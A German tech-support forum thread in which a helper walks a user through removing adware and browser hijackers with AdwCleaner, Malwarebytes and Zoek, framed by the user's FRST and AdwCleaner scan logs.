BHO-x32: GMX MailCheck BHO -> {BF42D4A8-016E-4fcd-B1EB-837659FD77C6} -> C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
BHO-x32: DownloadProtect Extension -> {C654F3FE-8E84-4BB7-87CF-8D9171FC3C73} -> C:\Program Files (x86)\{3D935F8C-7FB2-48EB-BE01-3C05181A9F03}\{AEA80DD1-3796-419E-ACF1-621F4DEE71A5}.bin [2016-02-06] (Download Protect)
BHO-x32: shopperz010220161759 -> {F64D5F15-81C2-4573-814A-31A0BF41A433} -> C:\Program Files\shopperz010220161759\Lonbee.dll [2016-02-01] ()
Toolbar: HKLM - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Toolbar: HKLM-x32 - GMX MailCheck - {C424171E-592A-415a-9EB1-DFD6D95D3530} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: dssrequest - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-29] (McAfee, Inc.)
Handler: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler-x32: gmx - {8FAF0273-9CA8-4efc-9536-1E35E254D5CD} - C:\Program Files (x86)\GMX MailCheck\IE\GMX_MailCheck.dll [2015-12-17] (1und1 Mail und Media GmbH)
Handler: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\x64\McIEPlg.dll [2015-12-23] (McAfee, Inc.)
Handler-x32: sacore - {5513F07E-936B-4E52-9B00-067394E91CC5} - c:\Program Files (x86)\McAfee\SiteAdvisor\McIEPlg.dll [2015-12-29] (McAfee, Inc.)
Filter: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files\mcafee\msc\McSnIePl64.dll [2012-05-14] (McAfee, Inc.)
Filter-x32: application/x-mfe-ipt - {3EF5086B-5478-4598-A054-786C45D75692} - c:\Program Files (x86)\McAfee\msc\McSnIePl.dll [2012-05-14] (McAfee, Inc.)
StartMenuInternet: IEXPLORE.EXE - iexplore.exe

FireFox:
========
FF ProfilePath: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1
FF NewTab: chrome://quick_start/content/index.html
FF DefaultSearchEngine: yessearches
FF DefaultSearchEngine.US: data:text/plain,browser.search.defaultenginename.US=yessearches
FF SelectedSearchEngine: yoursearching
FF Homepage: search.mpc.am
FF Keyword.URL: hxxp://www.yessearches.com/chrome.php?uid=3D1DFE7FACF36BF04423BA9045228492&ptid=sqr1&ts=AHEpB38oBXYsBE..&v=20160121&mode=ffexttoolbar&q=
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [2012-05-14] ()
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel(R) Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-07] (Intel Corporation)
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\progra~2\mcafee\msc\npmcsn~1.dll [2012-05-14] ()
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js [2016-02-06]
FF user.js: detected! => C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js [2016-02-06]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\DD1B66D4.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml [2016-01-31]
FF SearchPlugin: C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml [2016-01-31]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected  - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: FirefixTab - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com [2016-01-31] [ist nicht signiert]
FF Extension: YahooToolsProtected  - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com [2016-01-31] [ist nicht signiert]
FF HKLM\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF Extension: McAfee WebAdvisor - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi [2015-11-23]
FF HKLM-x32\...\Firefox\Extensions: [{4ED1F68A-5463-4931-9384-8FFF5ED91D92}] - C:\Program Files (x86)\McAfee\SiteAdvisor\saffplg.xpi
FF HKLM-x32\...\Firefox\Extensions: [deskCutv2@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\deskCutv2@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [yahooprotected@gmail.com] - C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\extensions\yahooprotected@gmail.com
FF HKLM-x32\...\Firefox\Extensions: [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}] - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}\{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}.xpi [2016-01-31]
FF HKLM-x32\...\Firefox\Extensions: [{F64D5F15-81C2-4573-814A-31A0BF41A433}] - C:\Program Files\shopperz010220161759\Firefox\{F64D5F15-81C2-4573-814A-31A0BF41A433}.xpi => nicht gefunden
FF HKLM-x32\...\Firefox\Extensions: [{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}] - C:\WINDOWS\Installer\{E3E74DF8-7DCB-4837-976C-49D4AA90DE6B}\{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}.xpi
FF Extension: Download Protect - C:\WINDOWS\Installer\{E3E74DF8-7DCB-4837-976C-49D4AA90DE6B}\{1FEC24E4-4517-4ECE-802C-F57D4F53A8E1}.xpi [2016-02-06]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK
FF Extension: McAfee Anti-Spam Thunderbird Extension - C:\Program Files\McAfee\MSK [2016-01-31] [ist nicht signiert]
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\defaults\pref\!FCD01E059CED5F6D5A56ED297FC9FBBCFCD0.js [2016-01-31] <==== ACHTUNG
FF ExtraCheck: C:\Program Files (x86)\mozilla firefox\FCD01E059CED5F6D5A56ED297FC9FBBCFCD0 [2016-01-31] <==== ACHTUNG

Chrome: 
=======
CHR HKLM\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]
CHR HKU\S-1-5-21-2229505580-413648313-3343944023-1002\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [jlcgehabolcakkjhgmgpkagpolbjlhfa] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [fheoggkfdfchfphceeifdbepaooicaho] - C:\Program Files (x86)\McAfee\SiteAdvisor\McChPlg.crx [2016-02-06]

deeprybka · 07.02.2016, 15:14

Hi,

Schritt 1

Bitte deinstalliere folgende Programme:

BoBrowser
Body Text Feathering
BubbleSound
DNS Unlocker version 1.4
GamesDesktop 014.005010223
GamesDesktop 014.005010228
Games-desktop Maintenance 014.184
Max Driver Updater
Satellite Comma
Search Protect
SearchModule
Setup
shopperz
SpaceSoundPro
SpaceSoundPro Service
SVH
Update for PriceFountain
yoursearching uninstall

Versuche es bei Windows 8

mit der Windowstaste + X über

.

Sollte das nicht gehen, lade Dir bitte Revo Uninstaller

hier herunter. Entpacke die zip-Datei auf den Desktop. Anleitung

Starte die Revouninstaller.exe
Klicke auf Optionen und wähle als Sprache Deutsch.
Suche im Uninstallerfeld nach den oben angegebenen Programmen und wähle sie einzeln aus.
Klicke jedes Mal auf Uninstall.
Wähle anschließend den Modus "Moderat" aus.
Reste löschen:
Klicke auf dann auf und dann auf .

Wenn Du ein Programm nicht deinstallieren kannst, mach mit dem nächsten weiter.
Auch wenn am Ende noch Programme übrig geblieben sind, führe den nächsten Schritt aus:

Schritt 2
Downloade Dir bitte

AdwCleaner auf deinen Desktop.

Schließe alle offenen Programme und Browser. Bebilderte Anleitung zu AdwCleaner.
Starte die AdwCleaner.exe mit einem Doppelklick.
Stimme den Nutzungsbedingungen zu.
Klicke auf Optionen und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
- "Tracing" Schlüssel löschen
- Winsock Einstellungen zurücksetzen
- Proxy Einstellungen zurücksetzen
- Internet Explorer Richtlinien zurücksetzen
- Chrome Richtlinien zurücksetzen
- Stelle sicher, dass alle 5 Optionen wie hier dargestellt, ausgewählt sind
Klicke auf Suchlauf und warte bis dieser abgeschlossen ist.
Klicke nun auf Löschen und bestätige auftretende Hinweise mit Ok.
Dein Rechner wird automatisch neu gestartet. Nach dem Neustart öffnet sich eine Textdatei. Poste mir deren Inhalt mit deiner nächsten Antwort.
Die Logdatei findest du auch unter C:\AdwCleaner\AdwCleaner[Cx].txt. (x = fortlaufende Nummer).

Schritt 3

Download und Anleitung
Starte Malwarebytes' Anti-Malware (MBAM).
Unter Einstellungen/ Erkennung und Schutz setze bitte einen Haken bei "Suche nach Rootkits".
Klicke im Anschluss auf Scannen, wähle den Bedrohungssuchlauf aus und klicke auf Suchlauf starten.
Am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Auswahl entfernen.
Lass Deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
Starte MBAM, klicke auf Verlauf und dann auf Anwendungsprotokolle.
Wähle das neueste Scan-Protokoll aus und klicke auf Export. Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab. Das Logfile von MBAM findest du hier.
Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.

Schritt 4
Download von

ZOEK (by Smeenk)

Speichere die zoek.exe auf dem Desktop.
Bitte deaktiviere während der Verwendung von Zoek Deinen Virenscanner, da dieser Zoek stören könnte.
Starte die zoek.exe mit einem Doppelklick und warte bis die Programmoberfläche erscheint (ca. 30 Sekunden)
Kopiere den Text der folgenden Box in das Skriptfenster von Zoek:
Code:
ATTFilter
```
systemspecs;
autoclean;
FFdefaults;
iedefaults;
emptyclsid;
         
```

Nun klicke auf "Run script" und sei geduldig bis das Skript durchgelaufen ist.

Zitat:

Zoek.exe is running now.
Do not start any browser windows, they may get closed automatically.
Please wait! This window will close when finished.
A logfile will open afterwards and can also be found on your systemdrive as zoek-results.log

Wenn das Tool fertig ist, wird sich eine Logdatei öffnen (ggf. erst nach einem Neustart). Das Log befindet sich aber auch noch unter C:\
Bitte poste mir das zoek-results.log.

Schritt 5

Bitte starte FRST erneut, markiere auch die checkbox

und drücke auf Untersuchen.
Bitte poste mir den Inhalt der beiden Logs die erstellt werden.

crazyhorse57 · 08.02.2016, 00:34

AdwCleaner C1

Code:

ATTFilter

# AdwCleaner v5.032 - Bericht erstellt am 07/02/2016 um 22:36:28
# Aktualisiert am 31/01/2016 von Xplode
# Datenbank : 2016-02-07.2 [Server]
# Betriebssystem : Windows 8  (x64)
# Benutzername : Manz - HAUS
# Gestartet von : E:\AdwCleaner_5.032.exe
# Option : Löschen
# Unterstützung : hxxp://toolslib.net/forum

***** [ Dienste ] *****

[-] Dienst Gelöscht : cherimoya
[-] Dienst Gelöscht : ClaraUpdater
[-] Dienst Gelöscht : SSFK
[-] Dienst Gelöscht : DnsBlockUpdateSvc
[-] Dienst Gelöscht : MPCProtectService
[-] Dienst Gelöscht : WdMan
[-] Dienst Gelöscht : MPCKpt
[-] Dienst Gelöscht : nekydufizbt
[-] Dienst Gelöscht : qigypevozbt
[-] Dienst Gelöscht : wucotusy
[-] Dienst Gelöscht : zutuzuni

***** [ Ordner ] *****

[-] Ordner Gelöscht : C:\Program Files\SOUND+
[-] Ordner Gelöscht : C:\Program Files\{05EB6F99-463B-44CA-93A7-7C57786E2569}
[-] Ordner Gelöscht : C:\Program Files\{BBA6D671-3BA2-4BBC-9A9A-4C748AD4901E}
[-] Ordner Gelöscht : C:\Program Files\{BC760D76-4920-48C3-A3DD-6689681D1D92}
[-] Ordner Gelöscht : C:\Program Files\shopperz010220161759
[#] Ordner Gelöscht : C:\Program Files (x86)\MPC Cleaner
[-] Ordner Gelöscht : C:\Program Files (x86)\Professional Cleaning Software
[-] Ordner Gelöscht : C:\Program Files (x86)\QuickSearch
[-] Ordner Gelöscht : C:\Program Files (x86)\SecurityUtility
[-] Ordner Gelöscht : C:\Program Files (x86)\SFK
[-] Ordner Gelöscht : C:\Program Files (x86)\SearchesToYesbnd
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454245483-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454247040-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\B5B53C54-1454872248-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Program Files (x86)\Super Great
[-] Ordner Gelöscht : C:\Program Files (x86)\{6E5909E8-3B98-4878-BF84-218A47B5BDBE}
[-] Ordner Gelöscht : C:\Program Files (x86)\{81124F8F-D6AB-4912-9F8D-54DC4E6DDE56}
[-] Ordner Gelöscht : C:\Program Files (x86)\{FC83B1F4-FC2A-4AED-BF32-D1F007D9AB1D}
[-] Ordner Gelöscht : C:\Program Files (x86)\rec_en_77
[-] Ordner Gelöscht : C:\Program Files (x86)\SpaceSondPro_v53.12571
[-] Ordner Gelöscht : C:\Program Files (x86)\Common Files\ClaraUpdater
[-] Ordner Gelöscht : C:\ProgramData\Microsoft\Windows\Start Menu\Programs\MPC
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\BoBrowser
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\BrowserAir
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\DnsBlock
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\ext_funfeedr
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Professional_Cleaning_Sof
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454249191-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454273619-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454875958-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\B5B53C54-1454881735-E111-8F5D-B888E3A0B275
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\APN-Stub
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\MPC
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Local\Temp\Super Great
[-] Ordner Gelöscht : C:\Users\Manz\AppData\LocalLow\{D2020D47-707D-4E26-B4D9-739C4F4C2E9A}
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\ASPackage
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Genius
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\istartpageing
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\PriceFountain
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Systweak
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\ASPackage
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BrowserAir
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Professional Cleaning Software
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\deskCutv2@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\Extensions\yahooprotected@gmail.com
[-] Ordner Gelöscht : C:\Users\Manz\Documents\ProfessionalCleaningSoftware
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{15BE6350-F697-486F-9D42-AEB6331C3B6D}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{386CE530-7A1F-4930-B6A0-12C686CC9468}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{40E468DE-4F96-445E-98FD-B843B650E95B}
[-] Ordner Gelöscht : C:\WINDOWS\Installer\{509E29BD-7FB8-4358-843B-6873FB59B15D}
[#] Ordner Gelöscht : C:\WINDOWS\SysNative\Tasks\Genius

***** [ Dateien ] *****

[-] Datei Gelöscht : C:\END
[-] Datei Gelöscht : C:\ProgramData\{262E20B8-6E20-4CEF-B1FD-D022AB1085F5}.dat
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Chromium\User Data\Default\Local Storage\hxxp_www.palikan.com_0.localstorage-journal
[-] Datei Gelöscht : C:\Users\Manz\AppData\Local\Temp\lengine.ini.log
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BoBrowser.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\41A66E7E5EE1\searchplugins\yoursearching.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\smod.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\6kib25c4.default\searchplugins\yoursearching.xml
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\user.js
[-] Datei Gelöscht : C:\Users\Manz\AppData\Roaming\Mozilla\Firefox\Profiles\CCACCBF1-7AB4-4CF5-B32D-668C686A539F\searchplugins\istartpageing.xml
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Facebook.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Youtube.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\BrowserAir.lnk
[-] Datei Gelöscht : C:\Users\Manz\Desktop\Sound+.lnk
[-] Datei Gelöscht : C:\Users\Public\Desktop\MPC Cleaner.lnk
[-] Datei Gelöscht : C:\WINDOWS\SysNative\roboot64.exe
[-] Datei Gelöscht : C:\WINDOWS\SysNative\DnsBlockUpdateSvc.exe
[-] Datei Gelöscht : C:\WINDOWS\SysNative\dns.block
[-] Datei Gelöscht : C:\WINDOWS\SysNative\GroupPolicy\Machine\Registry.pol
[-] Datei Gelöscht : C:\WINDOWS\SysNative\GroupPolicy\GPT.ini
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\cherimoya.sys
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\MPCKpt.sys
[-] Datei Gelöscht : C:\WINDOWS\SysNative\drivers\sdfhgdf.sys
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\dns.block
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\lavasofttcpservice.dll
[-] Datei Gelöscht : C:\WINDOWS\SysWOW64\GroupPolicy\GPT.ini

***** [ DLLs ] *****

[-] Datei Desinfiziert : C:\WINDOWS\SysNative\dnsapi.dll
[-] Datei Desinfiziert : C:\WINDOWS\SysWOW64\dnsapi.dll

***** [ Verknüpfungen ] *****


***** [ Aufgabenplanung ] *****

[-] Geplante Aufgabe Gelöscht : Run_Bobby_Browser
[-] Geplante Aufgabe Gelöscht : Go_Palikan
[-] Geplante Aufgabe Gelöscht : crash_service
[-] Geplante Aufgabe Gelöscht : runTask
[-] Geplante Aufgabe Gelöscht : updateTask
[-] Geplante Aufgabe Gelöscht : IBUpd
[-] Geplante Aufgabe Gelöscht : Genius
[-] Geplante Aufgabe Gelöscht : Genius_Interval
[-] Geplante Aufgabe Gelöscht : ProfessionalCleaningSoftware_Popup
[-] Geplante Aufgabe Gelöscht : ProfessionalCleaningSoftware_Start
[-] Geplante Aufgabe Gelöscht : IBUpd2
[-] Geplante Aufgabe Gelöscht : Security Utility Updater
[-] Geplante Aufgabe Gelöscht : Security Utility Updater

***** [ Registrierungsdatenbank ] *****

[-] Schlüssel Gelöscht : HKCU\Software\Microsoft\Windows\CurrentVersion\App Paths\bobrowser.exe
[-] Schlüssel Gelöscht : HKCU\Software\Mozilla\Extends
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\DPBHO.DLL
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\bobrowser.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\MediaPlayer\ShimInclusionList\BrowserAir.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates\A7BD54B233B5B2F70AF86F5BD1A0C0A772A59FC6
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\D830B6B8939ACB4928401060203BB648456BB4F8
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SystemCertificates\Root\Certificates\F53E693DDABF57A88A9B12B608B09B26C0608B74
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\ProfessionalCleaningSoftware.exe
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\MICROSOFT\SYSTEMCERTIFICATES\ROOT\CERTIFICATES\26D9E607FFF0C58C7844B47FF8B6E079E5A2220E
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010223]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_en_77]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [rec_de_184]
[-] Wert Gelöscht : HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run [gmsd_de_005010228]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [deskCutv2@gmail.com]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [yahooprotected@gmail.com]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{C3CD68D2-6088-4E72-BDE2-DE30DFFF4239}]
[-] Wert Gelöscht : HKLM\SOFTWARE\Mozilla\Firefox\Extensions [{63D7461E-C5DF-4012-87F0-A52D95FE9EC3}]
[-] Schlüssel Gelöscht : HKCU\Software\Google\Chrome\Extensions\jlcgehabolcakkjhgmgpkagpolbjlhfa
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{425F4ABF-B8E4-402D-9E49-06E494EB8DBF}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\AppID\{1C6F51F8-BCE6-4702-8952-6A8233359FBC}
[-] Schlüssel Gelöscht : HKCU\Software\Classes\CLSID\{17EF1FFB-0545-4C9A-BE64-78FF53338475}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{1AA60054-57D9-4F99-9A55-D0FBFBE7ECD3}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C424171E-592A-415A-9EB1-DFD6D95D3530}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{C654F3FE-8E84-4BB7-87CF-8D9171FC3C73}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{459DD0F7-0D55-D3DC-67BC-E6BE37E9D762}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B0E}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{11B16A3D-F03E-4565-A532-E66B219C9B03}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{8FF10FED-2F0A-4F7F-BE87-B04F1DCD4319}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\CLSID\{7D8DAE88-BC05-4578-8C29-E541FFBA5757}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{F2DB3739-77FB-41EB-9ED3-ABF34DF2DBF7}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{296E49AA-76AE-4392-8145-A06733310DF1}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\Interface\{7307C0C7-347E-48DD-BF91-F8E74D3FE764}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\Interface\{A9582D7B-F24A-441D-9D26-450D58F3CD17}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\Interface\{EE0D8859-2ED4-4B0D-9812-16865B9AFD65}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{E7BF74EE-9106-4113-B216-2F980BA29141}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[!] Schlüssel Nicht Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{14EF423E-3EE8-44AE-9337-07AC3F27B744}
[-] Schlüssel Gelöscht : HKLM\SOFTWARE\Classes\TypeLib\{CC5E6338-EB1B-4E46-8271-E691F9096452}
